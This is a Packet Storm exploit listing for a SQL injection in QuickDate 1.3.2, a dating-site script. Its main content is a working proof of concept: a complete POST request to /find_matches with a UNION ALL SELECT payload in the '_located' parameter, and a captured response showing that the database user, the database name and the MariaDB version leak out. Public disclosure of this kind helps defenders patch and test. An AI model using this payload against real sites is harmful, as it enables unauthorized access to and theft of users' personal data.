QuickDate 1.3.2 SQL Injection

2020-02-10T00:00:00
ID PACKETSTORM:156263
Type packetstorm
Reporter Ihsan Sencan
Modified 2020-02-10T00:00:00

Description

                                        
                                            `# Exploit Title: QuickDate 1.3.2 - SQL Injection  
# Dork: N/A  
# Date: 2020-02-07  
# Exploit Author: Ihsan Sencan  
# Vendor Homepage: https://quickdatescript.com/  
# Version: 1.3.2  
# Tested on: Linux  
# CVE: N/A  
  
# POC:   
# 1)  
#   
POST /find_matches HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 425  
Cookie: quickdating=a50b670982b01b4f0608a60217309d11; mode=night; JWT=a0823ac00ff28243d0c8caa841ebacd55bbf6d40f571d45bfb0f504e8b0b13be16222ee080568613ca7be8306ecc3f5fa30ff2c41e64fa7b  
DNT: 1  
Connection: close  
Upgrade-Insecure-Requests: 1  
  
_located=-7 UNION ALL SELECT%2BCONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113-- -  
#   
#   
HTTP/1.1 200 OK  
Date: Thu, 06 Feb 2020 15:05:34 GMT  
Server: Apache  
Connection: Keep-alive, close  
Access-Control-Allow-Origin: *  
Access-Control-Max-Age: 3600  
Access-Control-Allow-Headers: Content-Type, Access-Control-Allow-Headers, Authorization, X-Requested-With  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0  
Pragma: no-cache  
Vary: User-Agent  
Content-Type: application/json; charset=UTF-8  
Content-Length: 3844  
  
{"status":200,"page":1,"post":"{\"_located\":\"-7 UNION AL...... class=\"btn waves-effect dislike _dislike_textdate_main@localhost : date_main : 10.2.31-MariaDB\".......","where":"","message":"OK","can_send":1}  
#  
`